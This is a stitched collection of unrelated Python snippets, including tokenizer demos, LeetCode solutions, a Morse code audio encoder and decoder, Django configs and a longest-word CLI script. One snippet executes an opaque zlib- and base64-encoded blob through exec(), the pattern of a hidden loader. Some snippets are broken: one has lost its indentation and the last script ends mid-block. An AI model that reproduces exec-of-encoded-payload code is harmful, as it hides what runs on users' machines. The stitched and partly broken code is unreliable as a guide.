# Tokenize German text: sentence-split a file, then compare word tokenizers.
from nltk.tokenize import sent_tokenize
with open('sentence1.txt', 'r') as myfile:
    data = myfile.read().replace('\n', '')
sentences = sent_tokenize(data, language="german")
for s in sentences:
    print(s)
first_sentence = sentences[0]
# naive whitespace split, for comparison with the NLTK tokenizers below
print(first_sentence.split())
from nltk.tokenize import word_tokenize, regexp_tokenize, wordpunct_tokenize, blankline_tokenize
print(word_tokenize(first_sentence))
# NOTE(review): '\w+' in a non-raw string works, but r'\w+' is safer.
print(regexp_tokenize(first_sentence, pattern='\w+'))
print(wordpunct_tokenize(first_sentence))
print(blankline_tokenize(first_sentence))
|
# Read n integers and print the lowest set bit of each.
n=int(input())
ip=input().split()
lsb=list()
num=list()
for i in range(n):
    num.append(int(ip[i]))
    # BUG FIX: isolate the lowest set bit with two's complement, x & -x.
    # The original used the boolean `and`, which simply yields -x for any
    # non-zero x instead of the lowest set bit.
    lsb.append(num[i] & -num[i])
print(lsb)
|
# -*- coding: utf-8 -*-
#leetcode 454
'''
Given four lists of integers A, B, C, D, count how many tuples
(i, j, k, l) satisfy A[i] + B[j] + C[k] + D[l] == 0.
Time complexity:  O(n^2) + O(n^2) = O(n^2)
Space complexity: O(n^2)
'''
def FourSum2(A,B,C,D):
    """Count tuples (i, j, k, l) with A[i] + B[j] + C[k] + D[l] == 0.

    Builds a histogram of all pairwise sums a + b, then for each pair
    sum c + d looks up how many a + b sums cancel it: O(n^2) time and
    space instead of the naive O(n^4) scan.
    """
    pair_counts = {}
    for a in A:
        for b in B:
            pair_counts[a + b] = pair_counts.get(a + b, 0) + 1
    total = 0
    for c in C:
        for d in D:
            total += pair_counts.get(-(c + d), 0)
    return total
'''
Variant 2: same O(n^2) idea via the standard library (collections.Counter).
'''
import collections
def FourSum22(A,B,C,D):
    """Count zero-sum tuples (i, j, k, l): Counter-based O(n^2) variant."""
    pair_counts = collections.Counter(a + b for a in A for b in B)
    return sum(pair_counts.get(-c - d, 0) for c in C for d in D)
# Sample input from the problem statement; expects res == 2.
A,B,C,D=[1,2],[-2,-1],[-1,2],[0,2]
res=FourSum2(A,B,C,D)
# Selenium / Power BI test fixture constants.
# Deep link to the delinquency report page (trailing space kept as-is).
report_url = "https://app.powerbi.com/groups/9ff0ac9f-8a38-42e9-be4b-d354a48bc434/reports/12c61b06-ddd8-40c6-ac2c" \
             "-c95bc06fd1dc/ReportSectionce36125dc6ab5c85d025 "
# Report titles checked against the rendered page.
report_title = "60+ Delinquency Report"
home_equity_report_title = "Home Equity Analysis"
# ChromeDriver binary path, relative to the test directory.
exe_path = "../drivers/chromedriver.exe"
|
import zlib, base64
exec(zlib.decompress(base64.b64decode('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')))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
|
f = open("../data/steam-200k_final.csv","r")
write_to = open("../data/vg_data_FIM.csv","w")
user_id = -1
string = ""
i = 0
for line in f:
if i == 0:
i += 1
continue
d = line.split('\n')[0].split(',')
print "Curr User_ID: " + str(user_id)
print "Curr Line's User_ID: " + d[0]
if user_id != int(d[0]) and user_id != -1:
print "Writing to file..."
write_to.write(string[:-1] + "\n")
user_id = int(d[0])
string = d[1] + ","
else:
user_id = int(d[0])
if d[1] not in string:
string += d[1] + ","
print "String: " + string |
from django.contrib import admin
from .models import CarrierTracker
# Expose CarrierTracker in the Django admin with the default ModelAdmin.
admin.site.register(CarrierTracker)
|
def greeting():
    """Print a hello message. Created by: Ioannis Tziokas."""
    print("Hello")
def add(a,b):
    """Return a + b (any operands supporting +, e.g. numbers or lists)."""
    return a + b
# A function returning multiple results as a tuple.
def addMultiply(a,b):
    """Return the pair (a + b, a * b)."""
    total = a + b
    product = a * b
    return total, product
# Demo driver: exercise the helpers above and inspect the results.
greeting()
x=add(1,2)
x2 = addMultiply(2,3)
print(x)
# add() also concatenates lists, since it only relies on +
x3=add([1,3],[4,3])
print(x3)
print(sorted(x3))
print(x2)
print(type(x))
print(greeting.__doc__)
# String keys for item metadata and relationships; their semantics are
# defined by the consumers elsewhere in the project.
KEYWORD = 'keyword'
KEYWORDS = 'keywords'
ITEM_TYPE = "item_type"
CONTAINED_BY = "contained_by"
FED_BY = 'fed_by'
CONTAINS = 'contains'
FEEDS = "feeds"
words = ['gallery', 'recasts', 'casters', 'marine', 'bird', 'largely', 'actress', 'remain', 'allergy']
def find_anagrams(list):
    """Group words that are anagrams of each other.

    Maps each word's alphabetically-sorted letters (its anagram
    signature) to the list of input words sharing that signature.
    """
    grouped = {}
    for word in list:
        signature = ''.join(sorted(word))
        grouped.setdefault(signature, []).append(word)
    return grouped
# Alternative that grows each bucket via dict.get().
def find_anagrams2(list):
    """Group anagrams: sorted-letter signature -> list of matching words."""
    grouped = {}
    for word in list:
        signature = ''.join(sorted(word))
        grouped[signature] = grouped.get(signature, []) + [word]
    return grouped
#print(''.join(sorted(words[0])))
# Show the anagram groups for the sample word list.
print(find_anagrams2(words))
import pyaudio
import struct
import math
import time
import soundfile
import copy
import wave
FORMAT = pyaudio.paInt16   # 16-bit PCM samples
CHANNELS = 1               # mono
RATE = 44100               # sample rate, Hz
TONE = 700                 # tone frequency in Hz for dots/dashes
TIMEPERIOD = 0.30          # duration of one morse unit (a dot), seconds
PARIS = 40                 # units counted for the word "PARIS" (see the WPM math in main())
MIN = 60                   # seconds per minute, for WPM timing
p = pyaudio.PyAudio()      # shared PyAudio instance used by play()
# Morse lookup table: '*' is a dot, '-' is a dash (letters a-z, digits 0-9).
morse = {
    "a": "*-",
    "b": "-***",
    "c": "-*-*",
    "d": "-**",
    "e": "*",
    "f": "**-*",
    "g": "--*",
    "h": "****",
    "i": "**",
    "j": "*---",
    "k": "-*-",
    "l": "*-**",
    "m": "--",
    "n": "-*",
    "o": "---",
    "p": "*--*",
    "q": "--*-",
    "r": "*-*",
    "s": "***",
    "t": "-",
    "u": "**-",
    "v": "***-",
    "w": "*--",
    "x": "-**-",
    "y": "-*--",
    "z": "--**",
    "1": "*----",
    "2": "**---",
    "3": "***--",
    "4": "****-",
    "5": "*****",
    "6": "-****",
    "7": "--***",
    "8": "---**",
    "9": "----*",
    "0": "-----"
}
def get_time_period(wpm):
    """Return the morse unit (dot) duration in seconds for a given WPM."""
    return MIN / (PARIS * wpm)
def save_wav(filename, morsecode):
    """Render a morse string ('*', '-', ' ') to 16-bit mono PCM and save as WAV.

    :param filename: destination .wav path
    :param morsecode: morse string as produced by to_morse()
    """
    frames = get_morse_frame(morsecode)
    wf = wave.open(filename, 'wb')
    try:
        wf.setnchannels(CHANNELS)
        wf.setsampwidth(2)  # 2 bytes per sample = 16-bit
        wf.setframerate(RATE)
        wf.writeframes(bytearray(frames))
    finally:
        # close the file even if writing fails (the original leaked it)
        wf.close()
    # typo fix: "audo" -> "audio"
    print("Save the morse code audio to " + filename)
def data_for_offtime(time):
    """Return packed 16-bit silence frames covering `time` seconds."""
    frame_count = int(RATE * time)
    samples = [0] * frame_count
    return struct.pack(str(len(samples)) + 'h', *samples)
def data_for_freq(frequency, time):
    """Return packed 16-bit PCM frames of a sine tone.

    Generates int(RATE * time) samples of a sine wave at `frequency` Hz,
    scaled to the full signed 16-bit range and packed as shorts.
    """
    frame_count = int(RATE * time)
    frames_per_wave = RATE / frequency
    samples = []
    for n in range(frame_count):
        # fraction of the current wave cycle this sample sits at,
        # mapped onto 0..2*pi for math.sin
        phase = (n / frames_per_wave) * (2 * math.pi)
        samples.append(int(math.sin(phase) * 32767))
    return struct.pack(str(len(samples)) + 'h', *samples)
def get_morse_frame(morsecode):
    """Build the raw sample list for a morse string.

    '*' -> one unit of tone, '-' -> three units of tone, ' ' -> three
    units of silence.  Every tone is followed by one unit of silence so
    consecutive dots/dashes do not run together (this mirrors the
    TIMEPERIOD sleep that play_morse() inserts after each tone).
    """
    global TONE, TIMEPERIOD
    morseframes = []
    for symbol in morsecode:
        if symbol == "*":
            morseframes.extend(data_for_freq(TONE, TIMEPERIOD))
            # BUG FIX: the inter-symbol gap was computed but never appended
            morseframes.extend(data_for_offtime(TIMEPERIOD))
        elif symbol == "-":
            morseframes.extend(data_for_freq(TONE, TIMEPERIOD * 3))
            # BUG FIX: same missing gap after a dash
            morseframes.extend(data_for_offtime(TIMEPERIOD))
        elif symbol == " ":
            morseframes.extend(data_for_offtime(TIMEPERIOD * 3))
    return morseframes
def play(frequency, time):
    """Synthesize a tone and play it synchronously on the default output."""
    frames = data_for_freq(frequency, time)
    stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, output=True)
    stream.write(frames)
    stream.stop_stream()
    stream.close()
def play_morse(morsecode):
    """Play a morse string aloud: '*' short tone, '-' long tone, ' ' pause.

    Each tone is followed by a one-unit pause; a space becomes a
    three-unit pause.
    """
    global TONE, TIMEPERIOD
    for symbol in morsecode:
        if symbol == "*":
            play(TONE, TIMEPERIOD)
            time.sleep(TIMEPERIOD)
        elif symbol == "-":
            play(TONE, TIMEPERIOD * 3)
            time.sleep(TIMEPERIOD)
        elif symbol == " ":
            time.sleep(TIMEPERIOD * 3)
def to_string(mcode):
    """Decode a morse string back to text; each decoded word gets a
    trailing space."""
    decoded = ""
    for word in getwords(mcode):
        for letter_code in getletters(word):
            decoded += getword(letter_code)
        decoded += " "
    return decoded
def getword(mcode):
    """Return the character(s) whose morse code equals mcode ('' if none)."""
    global morse
    match = ""
    for char, code in morse.items():
        if code == mcode:
            match += char
    return match
def getletters(mcode):
    """Split a morse word into per-letter codes (single-space separated)."""
    return mcode.split(" ")
def getwords(mcode):
    """ Get a list of words from a morsecode from a string split by double spaces"""
    # NOTE(review): the docstring says "double spaces" but the separator
    # below appears to be a single space -- confirm the intended word
    # delimiter (whitespace may not have survived copy/paste).
    wordlist = mcode.split(" ")
    wordlist = stripword(wordlist)
    return wordlist
def stripword(word):
    """Strip surrounding whitespace from every entry, mutating in place."""
    for index, entry in enumerate(word):
        word[index] = entry.strip()
    return word
def to_morse(mcode):
    """ Convert text to morse code """
    global morse
    # lower-case first: the morse table only has lower-case keys
    mcode = mcode.lower()
    morsetext = ""
    for x in mcode:
        if(x == " "):
            # NOTE(review): word gap emitted here -- confirm the number of
            # spaces survived copy/paste (getwords() expects word gaps wider
            # than the per-letter gap added below).
            morsetext += " "
        else:
            # raises KeyError for characters outside a-z / 0-9
            morsetext += morse[x] + " "
    return morsetext
def gettiming(process_list, typetiming):
    """Return the distinct durations of entries of the given type
    ('on' or 'off'), sorted ascending.

    Each process_list entry is [kind, start, stop, duration].
    """
    durations = {entry[3] for entry in process_list if entry[0] == typetiming}
    return sorted(durations)
def fixzerocrossing(sample_list, sample_rate):
    """
    Walk through the sample list and find duration of a tone or absence of tone
    Adjust the list by taking into account zero crossing points of a single(tone)
    """
    # A sine tone crosses zero every half-cycle, so getsamples() chops one
    # tone into many tiny 'on'/'off' fragments.  This pass appears to glue
    # those fragments back into one 'on' segment, closing it only at a
    # "real" silence (an 'off' run longer than the empirical thresholds
    # below -- see the commented-out alternatives kept from tuning).
    state = 0          # 1 = currently merging a fragmented tone
    process_list = []
    for x in range(len(sample_list)):
        if(sample_list[x][3] == 0.0 and state == 0):
            # zero-duration fragment: remember where the merged tone starts
            state = 1
            sample_start = sample_list[x][1]
        elif(sample_list[x][3] > 0.01 and state != 1): #!= 0.0 and state != 1): # add fix here
            # long stand-alone segment outside a merge: keep as-is
            process_list.append(sample_list[x])
        elif(sample_list[x][0] == 'off' and state == 1 and sample_list[x][3] > 0.002): # 9.049773755656108e-05): #!= 0.0):
            # real gap reached: emit the merged 'on' segment, keep the gap
            sample_stop = sample_list[x - 1][2]
            duration = getduration(sample_start, sample_stop, sample_rate)
            list1 = ["on", sample_start, sample_stop, duration]
            process_list.append(list1)
            process_list.append(sample_list[x])
            state = 0
        elif(x + 1 == len(sample_list) and sample_list[x-1][0] == 'off'):
            # end of input: close any merged tone still open
            sample_stop = sample_list[x][2]
            duration = getduration(sample_start, sample_stop, sample_rate)
            list1 = ["on", sample_start, sample_stop, duration]
            process_list.append(list1)
    return process_list
def getsamples(audio_samples, sample_rate):
    """Segment raw audio into alternating tone ('on') / silence ('off') runs.

    Returns a list of [kind, start_index, stop_index, duration_seconds]
    entries; a run ends whenever the signal flips between zero and
    non-zero.
    """
    # state: 0 = before the first sample, 1 = inside a tone, 2 = inside silence
    state = 0
    sample_list = [] # [start, stop, duration]
    sample_start = 0
    sample_stop = 0
    for x in range(len(audio_samples)):
        if(audio_samples[x] != float(0)):
            if(state == 0):
                # first sample is non-zero: a tone starts here
                sample_start = x
                state = 1
            elif(state == 2):
                # silence just ended: emit the 'off' run, start a tone
                sample_stop = x - 1
                duration = getduration(sample_start, sample_stop, sample_rate)
                list1 = ["off", sample_start, sample_stop, duration]
                sample_list.append(list1)
                sample_start = x
                state = 1
        elif(audio_samples[x] == 0):
            if(state == 0):
                sample_start = x
                state = 2
            elif(state == 1):
                # tone just ended: emit the 'on' run, start silence
                sample_stop = x - 1
                duration = getduration(sample_start, sample_stop, sample_rate)
                list1 = ["on", sample_start, sample_stop, duration]
                sample_list.append(list1)
                sample_start = x
                state = 2
    # NOTE(review): the final, still-open run is not emitted here --
    # fixzerocrossing() appears to compensate at end of input.
    return sample_list
def getduration(sample_start, sample_stop, sample_rate):
    """Return the duration in seconds spanned by the two sample indices."""
    return (sample_stop - sample_start) / sample_rate
def delleadingoff(process_list):
    """Drop a leading 'off' (silence) entry, if present, mutating in place.

    Fixed: the original raised IndexError for an empty list; an empty
    list is now returned unchanged.
    """
    if process_list and process_list[0][0] == 'off':
        del process_list[0]
    return process_list
def sound2morse(process_list, timing, spacing):
    """ loop through the process list and convert it to morse code"""
    # timing[0] is the shortest tone (a dot); any longer tone is a dash.
    # spacing[0] is the intra-letter gap (emits nothing), spacing[1] the
    # letter gap; any other silence is treated as a word gap.
    # NOTE(review): gap widths in the emitted string may not have
    # survived copy/paste -- confirm against getwords()/getletters().
    morsecode = ""
    for x in process_list:
        if(x[0] == 'on'):
            if(timing[0] == x[3]):
                morsecode +="*"
            else:
                morsecode +="-"
        else:
            if(spacing[1] == x[3]):
                morsecode += " "
            elif(spacing[0] == x[3]):
                pass
            else:
                morsecode += "  "
    return morsecode
def postprocesstiming(timingval):
    """Merge near-equal durations so later exact comparisons succeed.

    Any value within 10% of another (ratio strictly between 0.9 and 1.1)
    is overwritten with that other value.  Mutates and returns the list.
    e.g. [0.0766, 0.0768, 0.0766, 0.611, 1.68] collapses the first three
    entries to one representative value.
    """
    for i in range(len(timingval)):
        for j in range(len(timingval)):
            ratio = timingval[i] / timingval[j]
            if 0.9 < ratio < 1.1:
                timingval[j] = timingval[i]
    return timingval
def postprocess(process_list, timing, spacing, timing1, spacing1):
    """Swap each entry's duration for its merged ("post-processed") value.

    timing/spacing hold the raw 'on'/'off' durations and timing1/spacing1
    the merged values at the same indexes.  The 'on' branch stops at the
    first match; the 'off' branch keeps scanning (no break), so a freshly
    written value can match again later in the same scan.
    """
    for entry in process_list:
        if entry[0] == 'on':
            for idx in range(len(timing)):
                if timing[idx] == entry[3]:
                    entry[3] = timing1[idx]
                    break
        else:
            for idx in range(len(spacing)):
                if spacing[idx] == entry[3]:
                    entry[3] = spacing1[idx]
    return process_list
def soundinfo():
    """Decode the morse audio in test3morse.wav, printing every pipeline stage."""
    file_path = 'test3morse.wav'
    print('Open audio file path:', file_path)
    audio_samples, sample_rate = soundfile.read(file_path, dtype='int16')
    number_samples = len(audio_samples)
    print('Audio Samples: ', audio_samples)
    print('Number of Sample', number_samples)
    print('Sample Rate: ', sample_rate)
    # duration of the audio file
    duration = round(number_samples/sample_rate, 2)
    print('Audio Duration: {0}s'.format(duration))
    # pipeline: raw samples -> on/off runs -> merged tones -> timing classes
    sample_list = getsamples(audio_samples, sample_rate)
    process_list = fixzerocrossing(sample_list, sample_rate)
    process_list = delleadingoff(process_list)
    spacing = gettiming(process_list, 'off')
    timing = gettiming(process_list, 'on')
    # merge near-identical durations so exact comparisons work later
    spacing1 = copy.deepcopy(spacing)
    timing1 = copy.deepcopy(timing)
    spacing1 = postprocesstiming(spacing1 )
    timing1 = postprocesstiming(timing1)
    process_list = postprocess(process_list, list(timing), list(spacing), timing1, spacing1)
    spacing1 = sorted(set(spacing1))
    timing1 = sorted(set(timing1))
    # classify each run as dot/dash/gap, then decode back to text
    morsecode = sound2morse(process_list, list(timing1), list(spacing1))
    morsetext = to_string(morsecode)
    #print("sample list => ", sample_list)
    print("\n")
    print("process list => ", process_list)
    print("\n")
    print("spacing list => ", spacing)
    print("timing list => ", timing)
    print("spacing1 list => ", spacing1)
    print("timing1 list => ", timing1)
    print("morse code => ", morsecode)
    print("morse text => ", morsetext)
def printsamples(startsample, stopsample, audio_samples):
    """Debug helper: dump the raw sample values in an index range."""
    for idx in range(startsample, stopsample):
        print("audio_samples[x] ", audio_samples[idx])
        print("x - ", idx)
def main():
    """ The main programming entry"""
    # Reference strings used while testing the codec:
    # -- *- - - **** * *-- --* *-* *- -* - matthew Grant
    # -... .. --. -.-. .- - big cat
    # *--* *- *-* ** *** paris => * X 10 : _ X 4 (12) : "" X 9 : " " X 3(9) == 40
    # wpm => paris = 40 timeperiods => 40 X W X sec = wpm :
    # example: paris * 5 = 5wpm: paris = 5wpm => 0.025 = 1/40
    # time 40 = wpm => 1/40 wpm = timeperiod => 60/40 = time(sec)
    teststr = "paris"
    print("test string - ", teststr)
    # round-trip: text -> morse -> text, then play it aloud
    morse_code = to_morse(teststr)
    morse_text = to_string(morse_code)
    print("morsecode => ", morse_code)
    print("text => ", morse_text)
    play_morse(morse_code)
    #soundinfo()
    # NOTE(review): `morsecode` below is undefined in this scope -- the
    # commented call would need `morse_code` if re-enabled.
    #save_wav("cat5wpm1000.wav", morsecode)
if __name__ == "__main__":
    main()
from .evdev import get_devices as evdev_get_devices
from .evdev import get_joysticks
from .evdev import get_controllers
from .evdev import EvdevControllerManager as ControllerManager
from .x11_xinput_tablet import get_tablets
from .x11_xinput import get_devices as x11xinput_get_devices
def get_devices(display=None):
    """Return the combined device list from the evdev and X11/XInput backends."""
    evdev_devices = evdev_get_devices(display)
    xinput_devices = x11xinput_get_devices(display)
    return evdev_devices + xinput_devices
|
from numpy import std
class BreakException(Exception):
    """Raised by EarlyStop.check() to signal that training should stop."""
class EarlyStop(object):
    """Track validation losses and remember the best model seen so far.

    check() raises BreakException once a window of `patience` losses has
    zero standard deviation (i.e. the loss has plateaued).
    """

    def __init__(self):
        self.list_loss = []      # losses recorded since the window was last cleared
        self.best_model = None   # [model, loss] pair with the lowest loss so far

    def get_best_model(self):
        """Return the model associated with the lowest loss passed to check()."""
        return self.best_model[0]

    def check(self, loss, model, patience=10):
        """Record a loss/model pair; raise BreakException on a plateau."""
        self.list_loss.append(loss)
        # keep the pair with the lowest loss (ties keep the earlier model)
        if self.best_model is None or loss < self.best_model[1]:
            self.best_model = [model, loss]
        if len(self.list_loss) == patience:
            window_std = std(self.list_loss)
            self.list_loss = []  # start a fresh window either way
            if window_std == 0:
                raise BreakException()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
class TorextException(Exception):
    """Base exception for the package (Python 2: keeps `message` as unicode)."""
    def __init__(self, message=''):
        # byte strings (Python 2 `str`) are decoded so that self.message
        # is always unicode
        if isinstance(message, str):
            message = message.decode('utf8')
        self.message = message
    def __str__(self):
        # str() contexts get the message re-encoded as UTF-8 bytes
        return unicode(self).encode('utf-8')
    def __unicode__(self):
        return self.message
# route.py
class URLRouteError(TorextException):
    """Raised for errors while routing URLs (used by route.py)."""
# make_settings.py
class SettingsError(TorextException):
    """Raised for invalid settings (used by make_settings.py)."""
    pass
# app.py
class ArgsParseError(TorextException):
    """Raised when argument parsing fails (used by app.py)."""
    pass
# script.py
class CommandArgumentError(TorextException):
    """Raised for bad command arguments (used by script.py)."""
    pass
|
# 13. Roman to Integer
class Solution:
    """LeetCode 13: convert a roman numeral string to its integer value."""

    def romanToInt(self, s: str) -> int:
        # 'S' is a sentinel "previous symbol" larger than any real one,
        # so the first character always takes the non-subtractive branch.
        values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000, "S": 10000}
        prev = "S"
        parts = []
        for ch in s:
            if values[ch] <= values[prev]:
                # not a subtractive pair: contribute the plain value
                parts.append(values[ch])
            else:
                # subtractive pair (e.g. IV): replace the previous
                # contribution with (current - previous)
                parts.pop()
                parts.append(values[ch] - values[prev])
            prev = ch
        return sum(parts)
|
#!/usr/bin/env python3
# Project Euler 56: find the maximum digital sum of a**b for a, b < 100.
from lib import digits
max_sum = 0
best_a, best_b = 0, 0
for a in range(100):
    for b in range(100):
        # digits() is a project helper -- presumably yields the digits of
        # its argument; confirm against lib
        s = sum(map(int, digits(a**b)))
        if s > max_sum:
            max_sum = s
            best_a, best_b = a, b
# BUG FIX: previously printed the loop's final a, b, s (always 99, 99 and
# the digit sum of 99**99) instead of the values achieving the maximum.
print(best_a, best_b, max_sum)
from django.apps import AppConfig
class JustwriteConfig(AppConfig):
    """Django application configuration for the JustWrite app."""
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'JustWrite'
|
# !/usr/bin/env python3
"""
This is a script designed to find the longest word in the text file, transpose the letters and show
the result.
"""
import argparse
import concurrent.futures
import logging
import logging.handlers
import os
import re
import sys
from glob import glob
# Module logger named after this script's file name (sans extension).
logger = logging.getLogger(os.path.splitext(os.path.basename(sys.argv[0]))[0])
def file_reading(file_path: str) -> list:
    """Read a .txt file and return its non-empty, right-stripped lines.

    Exits with status 1 for non-.txt paths or on I/O errors.

    :param file_path: Path to the file the script needs to read.
    :return: the list of strings, extracted from the file.
    """
    logger.debug("Current file path: {}".format(file_path))
    err_msgs = {'file_format_err': "Error: not supported file format!"}
    if not file_path.endswith('.txt'):
        print(err_msgs['file_format_err'])
        logger.debug(err_msgs['file_format_err'])
        sys.exit(1)
    try:
        with open(file_path, "r") as f:
            # drop lines that are empty after stripping the right side
            return [line.rstrip() for line in f if line.rstrip()]
    except IOError as e:
        logger.exception("%s", e)
        sys.exit(1)
def transpose(string_list: list) -> None:
    """Find the longest word across the lines, print it and its reverse.

    Each line is cleaned (hyphen runs collapsed to spaces, stray hyphens
    detached, characters other than letters/hyphen/underscore/space
    removed) and split into words.  Ties keep the first word seen.
    Exits with code 1 when the list is empty; prints a notice when no
    word can be found at all.

    Output example:
        Original: abcde
        Transposed: edcba

    :param string_list: the list of strings to analyse
    :return: None
    """
    logger.debug("Got the list for analysis: {}".format(string_list))
    err_msgs = {"empty_list": "Error: the list of strings is empty!\n",
                "empty_string": 'There is only empty strings. Try to use another file.\n'}
    if not string_list:
        print(err_msgs['empty_list'])
        logger.debug(err_msgs['empty_list'])
        sys.exit(1)
    longest: str = ''
    for raw_line in string_list:
        line = raw_line.strip()
        if not line:
            continue
        # collapse runs of hyphens, detach stray hyphens, drop other symbols
        line = re.sub(r'([-])\1+', ' ', line)
        line = line.replace(' - ', ' ').replace('- ', ' ').replace(' -', ' ')
        line = re.sub(r'[^A-Za-z\- _]+', '', line)
        for candidate in line.split(' '):
            if candidate and len(candidate) > len(longest):
                longest = candidate
    reversed_word: str = longest[::-1]
    if reversed_word:
        conclusion = f"Original: {longest}\nTransposed: {reversed_word}\n"
    else:
        conclusion = err_msgs['empty_string']
    logger.debug(conclusion)
    print(conclusion)
def parse_args(arguments: list):
    """Build the CLI parser and parse `arguments`.

    At least one of -f (single file) or -p (folder) is required; the
    parser exits with an error otherwise.

    :param arguments: the list of arguments, added by the user from CLI
    :return: the namespace with arguments and values
    """
    parser = argparse.ArgumentParser(description=sys.modules[__name__].__doc__,
                                     formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument("-f", type=str, help="Path to the file")
    parser.add_argument("-p", type=str, help="Path to the folder with multiple files")
    verbosity = parser.add_mutually_exclusive_group()
    verbosity.add_argument("--debug", "-d", action="store_true", default=False, help="enable debugging mode")
    verbosity.add_argument("--silent", "-s", action="store_true", default=False, help="enable silent (only critical) mode")
    parsed = parser.parse_args(arguments)
    if not (parsed.f or parsed.p):
        parser.error('No files requested, add -f file_name or -p path_to_files or --help for more info.')
    return parsed
def setup_logging(opt) -> None:
    """Configure logging: DEBUG level with --debug, no console handler with --silent.

    :param opt: parsed CLI namespace providing the .debug and .silent flags
    """
    root = logging.getLogger("")
    root.setLevel(logging.WARNING)
    logger.setLevel(logging.DEBUG if opt.debug else logging.INFO)
    if not opt.silent:
        handler = logging.StreamHandler()
        handler.setFormatter(logging.Formatter("%(levelname)s [%(name)s]: %(message)s"))
        root.addHandler(handler)
def main(path: str) -> None:
    """
    The main method runs 'file reading' and 'transpose' methods. The entry point.
    :param path: path to the file
    """
    logger.debug("Working with the words from '{}' file".format(path))
    lines = file_reading(file_path=path)
    transpose(string_list=lines)
if __name__ == "__main__":
    args = parse_args(sys.argv[1:])
    setup_logging(opt=args)
    # "empty_string" is referenced by transpose() (err_msgs['empty_string'])
    # but was missing here, so the empty-input branch raised KeyError instead
    # of reporting the problem.
